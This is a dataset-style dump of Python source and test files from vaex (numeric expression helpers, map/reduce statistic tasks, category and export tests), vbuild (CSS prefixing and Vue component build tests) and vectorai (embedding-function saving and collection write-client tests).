""".strip().split()]
expression_namespace = {}
for name, numpy_name in function_mapping:
if not hasattr(np, numpy_name):
raise SystemError("numpy does not have: %s" % numpy_name)
else:
expression_namespace[name] = getattr(np, numpy_name)
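# For example, after this loop expression_namespace['sin'] is np.sin and
# expression_namespace['arctan2'](1.0, 1.0) returns pi / 4 (~0.785398).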
def fillna(ar, value, fill_nan=True, fill_masked=True):
'''Returns an array where missing values are replaced by value.
If the dtype is object, nan values and 'nan' string values
are replaced by value when fill_nan==True.
'''
if ar.dtype.kind in 'O' and fill_nan:
strings = ar.astype(str)
mask = strings == 'nan'
ar = ar.copy()
ar[mask] = value
elif ar.dtype.kind in 'f' and fill_nan:
mask = np.isnan(ar)
if np.any(mask):
ar = ar.copy()
ar[mask] = value
if fill_masked and np.ma.isMaskedArray(ar):
mask = ar.mask
if np.any(mask):
ar = ar.data.copy()
ar[mask] = value
return ar
expression_namespace['fillna'] = fillna
def dt_dayofweek(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.dayofweek.values
def dt_dayofyear(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.dayofyear.values
def dt_year(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.year.values
def dt_weekofyear(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.weekofyear.values
def dt_hour(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.hour.values
expression_namespace["dt_dayofweek"] = dt_dayofweek
expression_namespace["dt_dayofyear"] = dt_dayofyear
expression_namespace["dt_year"] = dt_year
expression_namespace["dt_weekofyear"] = dt_weekofyear
expression_namespace["dt_hour"] = dt_hour
def str_strip(x, chars=None):
# don't change the dtype, otherwise for each block the dtype may be different (string length)
return np.char.strip(x, chars).astype(x.dtype)
expression_namespace['str_strip'] = str_strip
def _float(x):
return x.astype(np.float64)
def _astype(x, dtype):
return x.astype(dtype)
expression_namespace["float"] = _float
expression_namespace["astype"] = _astype
def add_geo_json(ds, json_or_file, column_name, longitude_expression, latitude_expression, label=None, persist=True, overwrite=False, inplace=False, mapping=None):
ds = ds if inplace else ds.copy()
if not isinstance(json_or_file, (list, tuple)):
with open(json_or_file) as f:
geo_json = json.load(f)
else:
geo_json = json_or_file
def default_label(properties):
return " - ".join(properties.values())
label = label or default_label
features = geo_json['features']
list_of_polygons = []
labels = []
if mapping:
mapping_dict = {}
for i, feature in enumerate(features[:]):
geo = feature['geometry']
properties = feature['properties']
if mapping:
mapping_dict[properties[mapping]] = i
# print(properties)
# label = f"{properties['borough']} - {properties['zone']}'"
labels.append(label(properties))  # properties[label_key]
list_of_polygons.append([np.array(polygon_set[0]).T for polygon_set in geo['coordinates']])
M = np.sum([polygon_set.shape[1] for polygon_set in list_of_polygons[-1]])
# print(M)
# N += M
ds[column_name] = ds.func.inside_which_polygons(longitude_expression, latitude_expression, list_of_polygons)
if persist:
ds.persist(column_name, overwrite=overwrite)
ds.categorize(column_name, labels=labels, check=False)
if mapping:
return ds, mapping_dict
else:
return ds
```
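The `fillna` helper above is plain NumPy and can be exercised on its own. A small sketch, assuming `fillna` from the module above is in scope:
```python
import numpy as np

# NaN values in float arrays are replaced.
a = np.array([1.0, np.nan, 3.0])
print(fillna(a, value=0.0))    # ==> [1. 0. 3.]

# Masked entries of masked arrays are replaced as well.
m = np.ma.array([1.0, 2.0, 3.0], mask=[False, True, False])
print(fillna(m, value=-1.0))   # ==> [ 1. -1.  3.]
```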
#### File: vaex-core/vaex/tasks.py
```python
from functools import reduce
import logging
import numpy as np
import vaex.promise
from .utils import (_ensure_strings_from_expressions,
_ensure_string_from_expression,
_ensure_list,
_is_limit,
_isnumber,
_issequence,
_is_string,
_parse_reduction,
_parse_n,
_normalize_selection_name,
_normalize,
_parse_f,
_expand,
_expand_shape,
_expand_limits,
as_flat_float,
as_flat_array,
_split_and_combine_mask)
logger = logging.getLogger('vaex.tasks')
class Task(vaex.promise.Promise):
"""
:type: signal_progress: Signal
"""
def __init__(self, df=None, expressions=[], name="task"):
vaex.promise.Promise.__init__(self)
self.df = df
self.expressions = expressions
self.expressions_all = list(expressions)
self.signal_progress = vaex.events.Signal("progress (float)")
self.progress_fraction = 0
self.signal_progress.connect(self._set_progress)
self.cancelled = False
self.name = name
def _set_progress(self, fraction):
self.progress_fraction = fraction
return not self.cancelled # don't cancel
def cancel(self):
self.cancelled = True
@property
def dimension(self):
return len(self.expressions)
@classmethod
def create(cls):
ret = Task()
return ret
def create_next(self):
ret = Task(self.df, [])
self.signal_progress.connect(ret.signal_progress.emit)
return ret
class TaskBase(Task):
def __init__(self, df, expressions, selection=None, to_float=False, dtype=np.float64, name="TaskBase"):
if not isinstance(expressions, (tuple, list)):
expressions = [expressions]
# edges include everything outside at index 1 and -1, and nan's at index 0, so we add 3 to each dimension
self.selection_waslist, [self.selections, ] = vaex.utils.listify(selection)
Task.__init__(self, df, expressions, name=name)
self.to_float = to_float
self.dtype = dtype
def map(self, thread_index, i1, i2, *blocks):
class Info(object):
pass
info = Info()
info.i1 = i1
info.i2 = i2
info.first = i1 == 0
info.last = i2 == self.df.length_unfiltered()
info.size = i2 - i1
masks = [np.ma.getmaskarray(block) for block in blocks if np.ma.isMaskedArray(block)]
blocks = [block.data if np.ma.isMaskedArray(block) else block for block in blocks]
mask = None
if masks:
# find all 'rows', where all columns are present (not masked)
mask = masks[0].copy()
for other in masks[1:]:
mask |= other
# numpy masked arrays use mask==1 for masked (missing) values, whereas vaex masks use mask==1 for rows that are used
# blocks = [block[~mask] for block in blocks]
if self.to_float:
blocks = [as_flat_float(block) for block in blocks]
for i, selection in enumerate(self.selections):
if selection or self.df.filtered:
selection_mask = self.df.evaluate_selection_mask(selection, i1=i1, i2=i2, cache=True) # TODO
if selection_mask is None:
raise ValueError("performing operation on selection while no selection present")
if mask is not None:
selection_mask = selection_mask[~mask]
selection_blocks = [block[selection_mask] for block in blocks]
else:
selection_blocks = [block for block in blocks]
little_endians = len([k for k in selection_blocks if k.dtype.byteorder in ["<", "="]])
if not ((len(selection_blocks) == little_endians) or little_endians == 0):
def _to_native(ar):
if ar.dtype.byteorder not in ["<", "="]:
dtype = ar.dtype.newbyteorder()
return ar.astype(dtype)
else:
return ar
selection_blocks = [_to_native(k) for k in selection_blocks]
subblock_weight = None
if len(selection_blocks) == len(self.expressions) + 1:
subblock_weight = selection_blocks[-1]
selection_blocks = list(selection_blocks[:-1])
self.map_processed(thread_index, i1, i2, mask, *blocks)
return i2 - i1
class TaskMapReduce(Task):
def __init__(self, df, expressions, map, reduce, converter=lambda x: x, info=False, to_float=False, name="task"):
Task.__init__(self, df, expressions, name=name)
self._map = map
self._reduce = reduce
self.converter = converter
self.info = info
self.to_float = to_float
def map(self, thread_index, i1, i2, *blocks):
if self.to_float:
blocks = [as_flat_float(block) for block in blocks]
if self.info:
return self._map(thread_index, i1, i2, *blocks)
else:
return self._map(*blocks) # [self.map(block) for block in blocks]
def reduce(self, results):
return self.converter(reduce(self._reduce, results))
class TaskApply(TaskBase):
def __init__(self, df, expressions, f, info=False, to_float=False, name="apply", masked=False, dtype=np.float64):
TaskBase.__init__(self, df, expressions, selection=None, to_float=to_float, name=name)
self.f = f
self.dtype = dtype
self.data = np.zeros(df.length_unfiltered(), dtype=self.dtype)
self.mask = None
if masked:
self.mask = np.zeros(df.length_unfiltered(), dtype=np.bool)
self.array = np.ma.array(self.data, mask=self.mask, shrink=False)
else:
self.array = self.data
self.info = info
self.to_float = to_float
def map_processed(self, thread_index, i1, i2, mask, *blocks):
if self.to_float:
blocks = [as_flat_float(block) for block in blocks]
print(len(self.array), i1, i2)
for i in range(i1, i2):
print(i)
if mask is None or mask[i]:
v = [block[i - i1] for block in blocks]
self.data[i] = self.f(*v)
if mask is not None:
self.mask[i] = False
else:
self.mask[i] = True
print(v)
print(self.array, self.array.dtype)
return None
def reduce(self, results):
return None
# import numba
# @numba.jit(nopython=True, nogil=True)
# def histogram_numba(x, y, weight, grid, xmin, xmax, ymin, ymax):
# scale_x = 1./ (xmax-xmin);
# scale_y = 1./ (ymax-ymin);
# counts_length_y, counts_length_x = grid.shape
# for i in range(len(x)):
# value_x = x[i];
# value_y = y[i];
# scaled_x = (value_x - xmin) * scale_x;
# scaled_y = (value_y - ymin) * scale_y;
#
# if ( (scaled_x >= 0) & (scaled_x < 1) & (scaled_y >= 0) & (scaled_y < 1) ) :
# index_x = (int)(scaled_x * counts_length_x);
# index_y = (int)(scaled_y * counts_length_y);
# grid[index_y, index_x] += 1;
class StatOp(object):
def __init__(self, code, fields, reduce_function=np.nansum, dtype=None):
self.code = code
self.fixed_fields = fields
self.reduce_function = reduce_function
self.dtype = dtype
def init(self, grid):
pass
def fields(self, weights):
return self.fixed_fields
def reduce(self, grid, axis=0):
value = self.reduce_function(grid, axis=axis)
if self.dtype:
return value.astype(self.dtype)
else:
return value
class StatOpMinMax(StatOp):
def __init__(self, code, fields):
super(StatOpMinMax, self).__init__(code, fields)
def init(self, grid):
grid[..., 0] = np.inf
grid[..., 1] = -np.inf
def reduce(self, grid, axis=0):
out = np.zeros(grid.shape[1:], dtype=grid.dtype)
out[..., 0] = np.nanmin(grid[..., 0], axis=axis)
out[..., 1] = np.nanmax(grid[..., 1], axis=axis)
return out
class StatOpCov(StatOp):
def __init__(self, code, fields=None, reduce_function=np.sum):
super(StatOpCov, self).__init__(code, fields, reduce_function=reduce_function)
def fields(self, weights):
N = len(weights)
# counts, sums, cross product sums
return N * 2 + N**2 * 2 # ((N+1) * N) // 2 *2
class StatOpFirst(StatOp):
def __init__(self, code):
super(StatOpFirst, self).__init__(code, 2, reduce_function=self._reduce_function)
def init(self, grid):
grid[..., 0] = np.nan
grid[..., 1] = np.inf
def _reduce_function(self, grid, axis=0):
values = grid[...,0]
order_values = grid[...,1]
indices = np.argmin(order_values, axis=0)
# see e.g. https://stackoverflow.com/questions/46840848/numpy-how-to-use-argmax-results-to-get-the-actual-max?noredirect=1&lq=1
# and https://jakevdp.github.io/PythonDataScienceHandbook/02.07-fancy-indexing.html
if len(values.shape) == 2: # no binby
return values[indices, np.arange(values.shape[1])[:,None]][0]
if len(values.shape) == 3: # 1d binby
return values[indices, np.arange(values.shape[1])[:,None], np.arange(values.shape[2])]
if len(values.shape) == 4: # 2d binby
return values[indices, np.arange(values.shape[1])[:,None], np.arange(values.shape[2])[None,:,None], np.arange(values.shape[3])]
else:
raise ValueError('dimension %d not yet supported' % len(values.shape))
def fields(self, weights):
# the value found, and the value by which it is ordered
return 2
OP_ADD1 = StatOp(0, 1)
OP_COUNT = StatOp(1, 1)
OP_MIN_MAX = StatOpMinMax(2, 2)
OP_ADD_WEIGHT_MOMENTS_01 = StatOp(3, 2, np.nansum)
OP_ADD_WEIGHT_MOMENTS_012 = StatOp(4, 3, np.nansum)
OP_COV = StatOpCov(5)
OP_FIRST = StatOpFirst(6)
class TaskStatistic(Task):
def __init__(self, df, expressions, shape, limits, masked=False, weights=[], weight=None, op=OP_ADD1, selection=None, edges=False):
if not isinstance(expressions, (tuple, list)):
expressions = [expressions]
# edges include everything outside at index 1 and -1, and nan's at index 0, so we add 3 to each dimension
self.shape = tuple([k + 3 if edges else k for k in _expand_shape(shape, len(expressions))])
self.limits = limits
if weight is not None: # shortcut for weights=[weight]
assert weights == [], 'only provide weight or weights, not both'
weights = [weight]
del weight
self.weights = weights
self.selection_waslist, [self.selections, ] = vaex.utils.listify(selection)
self.op = op
self.edges = edges
Task.__init__(self, df, expressions, name="statisticNd")
#self.dtype = np.int64 if self.op == OP_ADD1 else np.float64 # TODO: use int64 for count and ADD1
self.dtype = np.float64
self.masked = masked
self.fields = op.fields(weights)
self.shape_total = (self.df.executor.thread_pool.nthreads,) + (len(self.selections), ) + self.shape + (self.fields,)
self.grid = np.zeros(self.shape_total, dtype=self.dtype)
self.op.init(self.grid)
self.minima = []
self.maxima = []
limits = np.array(self.limits)
if len(limits) != 0:
logger.debug("limits = %r", limits)
assert limits.shape[-1] == 2, "expected last dimension of limits to have a length of 2 (not %d, total shape: %s), of the form [[xmin, xmin], ... [zmin, zmax]], not %s" % (limits.shape[-1], limits.shape, limits)
if len(limits.shape) == 1: # short notation: [xmin, max], instead of [[xmin, xmax]]
limits = [limits]
logger.debug("limits = %r", limits)
for limit in limits:
vmin, vmax = limit
self.minima.append(float(vmin))
self.maxima.append(float(vmax))
# if self.weight is not None:
self.expressions_all.extend(weights)
def __repr__(self):
name = self.__class__.__module__ + "." + self.__class__.__name__
return "<%s(df=%r, expressions=%r, shape=%r, limits=%r, weights=%r, selections=%r, op=%r)> instance at 0x%x" % (name, self.df, self.expressions, self.shape, self.limits, self.weights, self.selections, self.op, id(self))
def map(self, thread_index, i1, i2, *blocks):
class Info(object):
pass
info = Info()
info.i1 = i1
info.i2 = i2
info.first = i1 == 0
info.last = i2 == self.df.length_unfiltered()
info.size = i2 - i1
masks = [np.ma.getmaskarray(block) for block in blocks if np.ma.isMaskedArray(block)]
blocks = [block.data if np.ma.isMaskedArray(block) else block for block in blocks]
mask = None
if masks:
mask = masks[0].copy()
for other in masks[1:]:
mask |= other
blocks = [block[~mask] for block in blocks]
#blocks = [as_flat_float(block) for block in blocks]
if len(blocks) != 0:
dtype = np.find_common_type([block.dtype for block in blocks], [])
histogram2d = vaex.vaexfast.histogram2d
if dtype.str in ">f8 <f8 =f8":
statistic_function = vaex.vaexfast.statisticNd_f8
elif dtype.str in ">f4 <f4 =f4":
statistic_function = vaex.vaexfast.statisticNd_f4
histogram2d = vaex.vaexfast.histogram2d_f4
elif dtype.str in ">i8 <i8 =i8":
dtype = np.dtype(np.float64)
statistic_function = vaex.vaexfast.statisticNd_f8
else:
dtype = np.dtype(np.float32)
statistic_function = vaex.vaexfast.statisticNd_f4
histogram2d = vaex.vaexfast.histogram2d_f4
#print(dtype, statistic_function, histogram2d)
blocks = [as_flat_array(block, dtype) for block in blocks]
this_thread_grid = self.grid[thread_index]
for i, selection in enumerate(self.selections):
if selection or self.df.filtered:
selection_mask = self.df.evaluate_selection_mask(selection, i1=i1, i2=i2, cache=True) # TODO
if selection_mask is None:
raise ValueError("performing operation on selection while no selection present")
if mask is not None:
selection_mask = selection_mask[~mask]
selection_blocks = [block[selection_mask] for block in blocks]
else:
selection_blocks = [block for block in blocks]
little_endians = len([k for k in selection_blocks if k.dtype.byteorder in ["<", "="]])
if not ((len(selection_blocks) == little_endians) or little_endians == 0):
def _to_native(ar):
if ar.dtype.byteorder not in ["<", "="]:
dtype = ar.dtype.newbyteorder()
return ar.astype(dtype)
else:
return ar
selection_blocks = [_to_native(k) for k in selection_blocks]
subblock_weight = None
subblock_weights = selection_blocks[len(self.expressions):]
selection_blocks = list(selection_blocks[:len(self.expressions)])
if len(selection_blocks) == 0 and subblock_weights == []:
if self.op == OP_ADD1: # special case for counting '*' (i.e. the number of rows)
if selection or self.df.filtered:
this_thread_grid[i][0] += np.sum(selection_mask)
else:
this_thread_grid[i][0] += i2 - i1
else:
raise ValueError("Nothing to compute for OP %s" % self.op.code)
else:
#blocks = list(blocks) # histogramNd wants blocks to be a list
# if False: #len(selection_blocks) == 2 and self.op == OP_ADD1: # special case, slighty faster
# #print('fast case!')
# assert len(subblock_weights) <= 1
# histogram2d(selection_blocks[0], selection_blocks[1], subblock_weights[0] if len(subblock_weights) else None,
# this_thread_grid[i,...,0],
# self.minima[0], self.maxima[0], self.minima[1], self.maxima[1])
# else:
statistic_function(selection_blocks, subblock_weights, this_thread_grid[i], self.minima, self.maxima, self.op.code, self.edges)
return i2 - i1
# return map(self._map, blocks)#[self.map(block) for block in blocks]
def reduce(self, results):
# for i in range(1, self.subspace.executor.thread_pool.nthreads):
# self.data[0] += self.data[i]
# return self.data[0]
# return self.data
grid = self.op.reduce(self.grid)
# If selection was a string, we just return the single selection
return grid if self.selection_waslist else grid[0]
```
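The map/reduce task above bins each block of rows into a private grid per thread and only merges those grids in reduce() via self.op.reduce(self.grid). Below is a minimal sketch of that pattern in plain NumPy, outside vaex; the names thread_grids, map_chunk and combine are illustrative, and only the OP_ADD1-style counting case is shown.
```python
import numpy as np

N_THREADS, N_BINS = 4, 16
thread_grids = np.zeros((N_THREADS, N_BINS))  # one private grid per worker thread

def map_chunk(thread_index, values, vmin, vmax):
    # bin this thread's chunk of values into its own grid (no locking required)
    bins = ((values - vmin) / (vmax - vmin) * N_BINS).astype(int)
    np.add.at(thread_grids[thread_index], np.clip(bins, 0, N_BINS - 1), 1)

def combine():
    # OP_ADD1-style reduce: sum the per-thread grids into one final histogram
    return thread_grids.sum(axis=0)

map_chunk(0, np.array([0.1, 0.2, 0.8]), 0.0, 1.0)
map_chunk(1, np.array([0.15, 0.9]), 0.0, 1.0)
counts = combine()  # total counts per bin across both "threads"
```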
#### File: vaex/tests/category_test.py
```python
from common import *
import collections
import numpy as np
import vaex
import pytest
def test_cat_string():
ds0 = vaex.from_arrays(colors=['red', 'green', 'blue', 'green'])
ds = ds0.label_encode('colors')#, ['red', 'green'], inplace=True)
assert ds.iscategory('colors')
assert ds.limits('colors', shape=128) == ([-0.5, 2.5], 3)
ds = ds0.label_encode('colors', values=['red', 'green'])
assert ds.iscategory('colors')
assert ds.limits('colors', shape=128) == ([-0.5, 1.5], 2)
assert ds.data.colors.tolist() == [0, 1, None, 1]
assert ds.copy().iscategory(ds.colors)
# with pytest.raises(ValueError):
# assert ds.iscategory('colors', values=['red', 'orange'])
def test_count_cat():
ds0 = vaex.from_arrays(colors=['red', 'green', 'blue', 'green'], counts=[1, 2, 3, 4])
ds0 = vaex.from_arrays(colors=['red', 'green', 'blue', 'green'], names=['apple', 'apple', 'berry', 'apple'])
ds = ds0.label_encode(ds0.colors)
ds = ds0.label_encode(ds0.names)
ds = ds0.label_encode('colors', ['red', 'green', 'blue'])
assert ds.count(binby=ds.colors).tolist() == [1, 2, 1]
ds = ds0.label_encode('colors', ['red', 'blue', 'green', ], inplace=True)
assert ds.count(binby=ds.colors).tolist() == [1, 1, 2]
def test_categorize():
ds0 = vaex.from_arrays(c=[0, 1, 1, 3])
ds0.categorize('c', ['a', 'b', 'c', 'd'])
assert ds0.iscategory(ds0.c)
assert ds0.category_labels(ds0.c) == ['a', 'b', 'c', 'd']
assert ds0.category_count(ds0.c) == 4
# def test_plot_cat():
# ds = vaex.from_arrays(colors=['red', 'green', 'blue', 'green'], counts=[4, ])
# ds.categorize('colors', inplace=True)#, ['red', 'green'], inplace=True)
```
#### File: vaex/tests/export_test.py
```python
from common import *
def test_export(ds_local, tmpdir):
ds = ds_local
# TODO: we eventually want to support dtype=object, but not for hdf5
ds = ds.drop(ds.obj)
path = str(tmpdir.join('test.hdf5'))
ds.export_hdf5(path)
ds = ds.sample(5)
path = str(tmpdir.join('sample.hdf5'))
ds.export_hdf5(path)
``` |
{
"source": "0xflotus/vbuild",
"score": 2
} |
#### File: 0xflotus/vbuild/tests.py
```python
import vbuild,sys
import unittest
class TestCss(unittest.TestCase):
def test_css1(self):
self.assertEqual(vbuild.mkPrefixCss("","XXX"),"")
def test_css2(self):
self.assertEqual(vbuild.mkPrefixCss(" a {color} "), "a {color}")
self.assertEqual(vbuild.mkPrefixCss(" a {color} ","XXX"),"XXX a {color}")
def test_cssTop(self):
t="""
:scope
{padding:4px;background: yellow}
button[ name ] {\t\tbackground:red /*que neni*/
}
hr *, body:hover {
color:red;}
p > a, p>i { /*nib*/ }
"""
ok="""
XXX {padding:4px;background: yellow}
XXX button[ name ] { background:red }
XXX hr *, XXX body:hover { color:red;}
XXX p > a, XXX p>i { }
"""
tt=vbuild.mkPrefixCss(t,"XXX")
self.assertEqual(tt,ok.strip())
class TestB(unittest.TestCase):
def test_composant_complet(self):
h="""
<template>
<div>
{{c}} <button @click="inc">++</button>
</div>
</template>
<script>
export default {
data () {
return {
c: 0,
}
},
methods: {
inc() {this.c+=1;}
}
}
</script>
<style>
:scope {
padding:4px;
background: yellow
}
button {background:red}
</style>
"""
r=vbuild.VBuild("name.vue",h)
#~ print(r, file=sys.stdout)
self.assertEqual(r.tags,["name"])
self.assertEqual(str(r).count("div[data-name]"),2)
self.assertFalse(":scope" in str(r))
self.assertTrue("<div data-name>" in str(r))
self.assertTrue('<script type="text/x-template" id="tpl-name">' in str(r))
self.assertTrue("var name = Vue.component('name', {template:'#tpl-name'," in str(r))
def test_composant_min(self):
h="""
<template>
<div>Load</div>
</template>
"""
r=vbuild.VBuild("name.vue",h)
self.assertTrue("<div data-name>" in str(r))
self.assertTrue('<script type="text/x-template" id="tpl-name">' in str(r))
self.assertTrue("var name = Vue.component('name', {template:'#tpl-name'," in str(r))
def test_composant_add(self):
c=vbuild.VBuild("c.vue","""<template><div>XXX</div></template>""")
cc=sum([c,c])
self.assertTrue(cc.html.count("<div data-c>XXX</div>")==2)
self.assertTrue(cc.script.count("var c = Vue.component('c', {template:'#tpl-c',});")==2)
self.assertTrue(cc.style=="")
def test_pickable(self): # so it's GAE memcach'able !
h="""
<template>
<div>Load</div>
</template>
"""
import pickle
r=vbuild.VBuild("name.vue",h)
f_string = pickle.dumps(r)
f_new = pickle.loads(f_string)
self.assertEqual(str(r),str(f_new))
class TestMinimize(unittest.TestCase):
def test_min(self):
s="""
async function jo(...a) {
var f=(...a) => {let b=12}
}
"""
x=vbuild.minimize(s)
self.assertTrue( "$jscomp" in x)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0xflotus/vectorai",
"score": 2
} |
#### File: tests/embed/test_save_funcs.py
```python
import os
import pytest
from vectorai.models import *
from appdirs import *
def test_start_utils_mixin():
utils_func = EmbedMixin()
assert True
def check():
"""Dummy function"""
return 1
def test_save_function():
"""Test adding an embedding function"""
mixin = EmbedMixin("test", "test")
index_name = "test"
vector_name = "test"
mixin.save_function(index_name, vector_name, check)
assert True
def test_load_function():
"""Test loading of the function"""
mixin = EmbedMixin("test", "test")
assert mixin.load_function("test", "test") == check
def test_load_function_keyerror():
"""Test loading of the function"""
with pytest.raises(KeyError):
mixin = EmbedMixin("test", "test")
assert mixin.load_function("test", "check") != check
@pytest.mark.xfail
def test_save_string_input():
"""Testing for string input. This should fail.
"""
string_input = "def function"
with pytest.raises(AssertionError):
mixin = EmbedMixin("test", "test")
mixin.save_function("test", "new", string_input)
```
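The tests above only check that EmbedMixin round-trips a function through save_function and load_function. A short usage sketch built on the same positional call signatures the tests use; the embed_length function and the "length" vector name are made up for illustration.
```python
from vectorai.models import EmbedMixin

def embed_length(text):
    # toy "embedding": a single feature, the length of the text
    return [float(len(text))]

mixin = EmbedMixin("test", "test")
mixin.save_function("test", "length", embed_length)

restored = mixin.load_function("test", "length")
assert restored("hello") == [5.0]
```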
#### File: vectorai/tests/test_write.py
```python
import json
import pytest
import os
import time
import numpy as np
try:
import tensorflow as tf
from vectorai.models.transformer_models import Transformer2Vec
except:
pass
from vectorai.write import ViWriteClient
from vectorai.errors import APIError
from vectorai.client import ViClient
class TestCollectionBasics:
@pytest.mark.use_client
def test_create_collection(self, test_client, test_collection_name, test_vector_field):
collection_name = test_collection_name
if collection_name in test_client.list_collections():
test_client.delete_collection(collection_name)
response = test_client.create_collection(
collection_name=collection_name, collection_schema={test_vector_field: 512}
)
assert response is None
@pytest.mark.use_client
def test_prevent_collection_overwrite(self, test_client, test_collection_name):
"""
Test that an existing collection is not overwritten.
"""
if test_collection_name not in test_client.list_collections():
test_client.create_collection(test_collection_name)
with pytest.raises(APIError):
response = test_client.create_collection(collection_name=test_collection_name)
@pytest.mark.use_client
def test_list_collections(self, test_collection_name, test_client):
response = test_client.list_collections()
assert response.count(test_collection_name) == 1
@pytest.mark.use_client
def test_delete_collection(self, test_client, test_collection_name):
response = test_client.delete_collection(collection_name=test_collection_name)
assert response['status'] == 'complete'
def test__as_json(test_client):
sample_document = {
"val": np.random.rand(20),
"val_2": np.random.rand(100)
}
sample_document_result = test_client._as_json(sample_document)
assert sample_document_result == sample_document
def assert_json_serializable(document, temp_json_file="test.json"):
"""Assert that a document is JSON serializable and is the same after loading back into Python.
"""
with open(temp_json_file, "w") as f:
json.dump(document, f)
return_document = json.load(open(temp_json_file, "r"))
os.remove(temp_json_file)
assert return_document == document
def test__as_json(test_client):
"""Test automatic JSON conversion for numpy arrays.
"""
sample_document = {"val": np.random.rand(20), "val_2": np.random.rand(100)}
sample_document_result = test_client._as_json(sample_document)
assert_json_serializable(sample_document_result)
@pytest.mark.use_tensorflow
def test__as_json_tensorflow(test_client):
"""Test automatic JSON conversion for tensorflow tensors.
"""
sample_document = {
"val": tf.random.uniform((1, 20)),
"val_2": tf.random.uniform((1, 20)),
}
sample_document_result = test_client._as_json(sample_document, flatten=True)
assert_json_serializable(sample_document_result)
@pytest.mark.use_tensorflow
def test__as_json_tensorflow_error_raise(test_client):
"""Test that error is raised with tensorflow conversion when rank (ndims) is greater than 2.
"""
sample_document = {"val": tf.random.uniform((1, 1, 20))}
with pytest.raises(APIError):
sample_document_result = test_client._as_json(sample_document)
class TestInsert:
@pytest.mark.use_client
def test_insert_single_document(self, test_client, test_collection_name):
if test_collection_name not in test_client.list_collections():
test_client.create_collection(test_collection_name)
document = {"sample_vector_": test_client.generate_vector(20), "sample_name": "hi"}
response = test_client.insert_document(
collection_name=test_collection_name, document=document
)
assert response is None
@pytest.mark.use_client
def test_insert_single_document_error(self, test_client, test_collection_name):
"""Trigger an insert failure error."""
with pytest.raises(APIError):
if test_collection_name not in test_client.list_collections():
test_client.create_collection(test_collection_name)
document = {
"sample_vectors_": [test_client.generate_vector(20)] + [np.nan],
"samplename": [["hi"]],
}
response = test_client.insert_document(
collection_name=test_collection_name, document=document
)
@pytest.mark.use_client
def test_clean_up(self, test_client, test_collection_name):
"""Remove a collection if it is there.
"""
if test_collection_name in test_client.list_collections():
test_client.delete_collection(test_collection_name)
assert test_collection_name not in test_client.list_collections()
class TestEdit:
@pytest.mark.use_client
def test_setup_for_read(self, test_client, test_collection_name):
"""Test Setup for Read Operations"""
if test_collection_name in test_client.list_collections():
test_client.delete_collection(collection_name=test_collection_name)
documents = [
{
"_id": "2",
"document_vector_": test_client.generate_vector(vector_length=512),
"attribute": "red",
},
{
"_id": "1",
"document_vector_": test_client.generate_vector(vector_length=512),
"attribute": "blue",
},
]
test_client.insert_documents(
collection_name=test_collection_name, documents=documents
)
assert True
@pytest.mark.use_client
def test_edit_document(self, test_client, test_collection_name):
test_client.insert_documents(test_collection_name,
test_client.create_sample_documents(10))
edits = {
"_id": "1",
"location": "Paris"
}
test_client.edit_document(
collection_name=test_collection_name, edits=edits
)
time.sleep(5)
doc = test_client.id(test_collection_name, document_id="1")
assert doc["location"] == "Paris"
@pytest.mark.use_client
def test_edit_documents(self, test_client, test_collection_name):
"""Test adding of an attribute
"""
edits = [
{"_id": "2", "location": "Sydney",},
{"_id": "1", "location": "New York",},
]
test_client.edit_documents(test_collection_name, edits, workers=2)
doc = test_client.id(test_collection_name, document_id="2")
assert doc["location"] == "Sydney"
doc = test_client.id(test_collection_name, document_id="1")
assert doc['location'] == 'New York'
@pytest.mark.use_client
def test_cleanup(self, test_client, test_collection_name):
if test_collection_name in test_client.list_collections():
test_client.delete_collection(test_collection_name)
# @pytest.mark.skip("Embed function is on pause until there is more clarity.")
# def test_multiple_insert_documents_embed(
# test_client,
# test_api_key,
# test_username,
# test_collection_name,
# test_vector_field,
# test_id_field,
# ):
# documents = [
# {"_id": "5", "attribute": "violet"},
# {"_id": "6", "attribute": "black"},
# ]
# class Model:
# def encode(self, document):
# return test_client.generate_vector(512)
# model = Model()
# test_client.insert_documents(
# test_collection_name, documents=documents, models={test_vector_field: model}
# )
# return_document = test_client.id(
# collection_name=test_collection_name, document_id="5"
# )
# assert return_document["attribute"] == "violet"
# return_document = test_client.id(
# collection_name=test_collection_name, document_id="6"
# )
# assert return_document["attribute"] == "black"
# @pytest.mark.skip(
# "Function embedding needs to be more " + "thoroughly discussed and may change."
# )
# def test_insert_document_embed(
# test_client, test_api_key, test_username, test_collection_name
# ):
# # The embed function string must be reproducible
# # test_client = ViClient(username="test")
# embed_func_str = f"""from vectorai import ViClient
# test_client = ViClient("{test_username}", "{test_api_key}")
# def embed_function(document):
# return test_client.generate_vector(512)
# """
# document = {"_id": 2, "attribute": "orange"}
# test_client.insert_document(
# collection_name=test_collection_name,
# document=document,
# use_embed_func=True,
# embed_func_list=[embed_func_str],
# search_vector_fields=["document_vector_"],
# )
def test__write_document_nested_field():
sample = {"this": {}}
ViWriteClient.set_field("this.is", doc=sample, value=[0, 2])
assert sample["this"]["is"] == [0, 2]
def test__write_document_nested_field_2():
sample = {"this": {"is": {}}}
ViWriteClient.set_field("this.is", doc=sample, value=[0, 2])
assert sample["this"]["is"] == [0, 2]
@pytest.mark.use_tensorflow
def test__encode_documents_with_models(test_client, sample_documents):
"""Test Model Encoding
"""
model = Transformer2Vec('distilbert')
roberta_model = Transformer2Vec('distilroberta')
test_client._encode_documents_with_models(sample_documents, models={'team': [model, roberta_model]})
assert 'distilbert' in test_client.get_name(model)
assert 'roberta' in test_client.get_name(roberta_model)
assert 'team_distilroberta_text_vector_' in sample_documents[0].keys()
assert 'team_distilbert_text_vector_' in sample_documents[0].keys()
@pytest.mark.use_client
def test_encode_documents_with_deployed_model(test_client, test_text_encoder):
"""
Test single encoding method for models.
"""
documents = test_client.create_sample_documents(10)
test_client._encode_documents_with_models(documents, models={'color': [test_text_encoder]}, use_bulk_encode=False)
assert 'color_vector_' in documents[0].keys()
assert len(documents[0]['color_vector_']) > 0
@pytest.mark.use_client
def test_bulk_encode_documents_with_deployed_model(test_client, test_text_encoder):
"""
Test bulk encoding method for models.
"""
documents = test_client.create_sample_documents(10)
